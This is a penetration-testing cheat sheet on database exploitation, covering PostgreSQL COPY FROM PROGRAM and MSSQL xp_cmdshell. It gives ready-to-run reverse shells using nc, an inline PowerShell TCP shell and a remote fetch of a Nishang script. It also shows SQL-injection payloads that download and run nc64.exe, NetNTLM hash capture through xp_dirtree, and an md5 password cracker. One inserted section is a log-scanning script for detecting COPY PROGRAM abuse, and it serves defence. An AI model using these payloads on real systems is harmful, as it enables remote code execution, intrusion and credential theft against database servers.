# Database Exploitation

## PostgreSQL Command Execution

### Using COPY TO/FROM PROGRAM

Installations running Postgres 9.3 and above have functionality that allows the superuser, and members of the `pg_execute_server_program` role, to pipe data to and from an external program using `COPY`.

**Check if the user is superuser**

```sql
SHOW is_superuser;
SELECT current_setting('is_superuser');
SELECT usesuper FROM pg_user WHERE usename = CURRENT_USER;
```

```sql
CREATE TABLE shell(output text);
COPY shell FROM PROGRAM 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP PORT >/tmp/f';
```
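A defender-side complement, added here and not part of the original cheat sheet: with `log_statement = 'all'` (or `'mod'`, which covers `COPY FROM` but not `COPY TO`) PostgreSQL writes the statement text to the server log, so the `COPY ... FROM/TO PROGRAM` pattern above can be alerted on. The log lines below are constructed to match the default `log_line_prefix` of `'%m [%p] '` and are not real entries.

```python
import re

# Constructed sample log lines (default log_line_prefix '%m [%p] ', log_statement = 'all').
# Line 4 uses mixed case and an inline comment to exercise the normalization step.
SAMPLE_LOG = """\
2024-05-01 10:00:01.001 UTC [4321] LOG:  statement: SELECT usesuper FROM pg_user WHERE usename = CURRENT_USER;
2024-05-01 10:00:02.002 UTC [4321] LOG:  statement: CREATE TABLE shell(output text);
2024-05-01 10:00:03.003 UTC [4321] LOG:  statement: COPY shell FROM PROGRAM 'id';
2024-05-01 10:00:04.004 UTC [4321] LOG:  statement: copy/**/shell  to  program 'cat > /tmp/out';
2024-05-01 10:00:05.005 UTC [4321] LOG:  statement: COPY orders FROM '/var/lib/postgresql/orders.csv' CSV;
"""

_LINE = re.compile(r"^\S+ \S+ \S+ \[(\d+)\] LOG:\s+statement: (.*)$")
_COMMENT = re.compile(r"/\*.*?\*/|--[^\n]*", re.S)
_COPY_PROGRAM = re.compile(r"\bcopy\b.*?\b(from|to)\s+program\b", re.I | re.S)
_QUOTED = re.compile(r"\bprogram\s+'((?:[^']|'')*)'", re.I | re.S)


def normalize_sql(sql):
    """Strip SQL comments and collapse whitespace so keyword matching is stable."""
    return re.sub(r"\s+", " ", _COMMENT.sub(" ", sql)).strip()


def find_copy_program(log_text):
    """Return (pid, direction, command) for every COPY ... FROM/TO PROGRAM statement.

    direction is 'FROM' or 'TO'; command is the single-quoted program string,
    or None when it is not a plain quoted literal (for example dollar quoting).
    """
    hits = []
    for line in log_text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue  # not a statement line (DETAIL, ERROR, continuation, ...)
        pid, stmt = int(m.group(1)), normalize_sql(m.group(2))
        cp = _COPY_PROGRAM.search(stmt)
        if not cp:
            continue  # ordinary COPY to/from a file or stdin is not in scope
        q = _QUOTED.search(stmt)
        command = q.group(1).replace("''", "'") if q else None
        hits.append((pid, cp.group(1).upper(), command))
    return hits


if __name__ == "__main__":
    for pid, direction, command in find_copy_program(SAMPLE_LOG):
        print(f"pid={pid} COPY {direction} PROGRAM command={command!r}")
```

Any hit from a role that is not expected to run server-side programs is worth an alert on its own; the plain file-based `COPY` on the last sample line is deliberately not reported.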

### PostgreSQL Cracking (md5 password + username)

The password hashes stored in `pg_shadow` use the format `md5(password + username)`, prefixed with the literal string `md5`, so the username acts as the salt.

If we cannot crack a PostgreSQL md5 hash with standard tools, we can use this script, which applies that format:

```python
import hashlib

# Stored value is "md5" + md5(password + username); the username is the salt.
target_hash = "md5ae8c67affdb169a42c9631c02fc67ede"
username = "rubben"

# rockyou.txt contains non-UTF-8 bytes, so read and re-encode it as latin-1
# to hash the original bytes of each candidate.
with open("/usr/share/wordlists/rockyou.txt", "r", encoding="latin-1") as f:
    for line in f:
        password = line.rstrip("\r\n")
        combo = password + username
        hashed = "md5" + hashlib.md5(combo.encode("latin-1")).hexdigest()
        if hashed == target_hash:
            print(f"[+] Password found: {password}")
            break
    else:
        print("[-] Password not found in wordlist")
```

## MSSQL

### Check privileges

```sql
SELECT IS_SRVROLEMEMBER('sysadmin');
```

### Enable xp\_cmdshell (With privileges)

From the `impacket-mssqlclient` prompt, the built-in helper command enables it in one step:

```
enable_xp_cmdshell
```

To establish a reverse shell (`rev.ps1` is a Nishang reverse shell):

{% code overflow="wrap" %}

```sql
EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.8.6.125/rev.ps1") | powershell -noprofile'

EXEC xp_cmdshell 'powershell -nop -w hidden -c "$c=New-Object Net.Sockets.TCPClient(''10.8.6.125'',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){;$d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1 | Out-String );$r2=$r+''PS ''+$env:COMPUTERNAME+''> ''; $s.Write(([text.encoding]::ASCII).GetBytes($r2),0,$r2.Length)}"'
```

{% endcode %}

**Other Method**

Connect with `impacket-mssqlclient` and enable `xp_cmdshell` manually through `sp_configure`:

```bash
impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth
```

```sql
EXECUTE sp_configure 'show advanced options', 1;
RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
```

### Steal NetNTLM Hash / Relay Attack (Without privileges)

Even when we cannot execute commands through `xp_cmdshell`, we can capture the NetNTLM hash of the SQL service account by making it authenticate to an SMB share we control, using `xp_dirtree` or `xp_fileexist`.

```sql
exec xp_dirtree '\\<ip>\smbFolder\file'
```

Then capture the hash with impacket's SMB server running on our host:

```bash
impacket-smbserver smbFolder $(pwd) -smb2support
```

### Enable xp\_cmdshell via SQL Injection

```sql
';EXEC sp_configure 'show advanced options', 1;--
';RECONFIGURE;--
';EXEC sp_configure "xp_cmdshell", 1;--
';RECONFIGURE;--

';EXEC xp_cmdshell "certutil -urlcache -f http://kali_ip/nc64.exe c:/windows/temp/nc64.exe";--

';EXEC xp_cmdshell "c:/windows/temp/nc64.exe IP PORT -e cmd";--
```
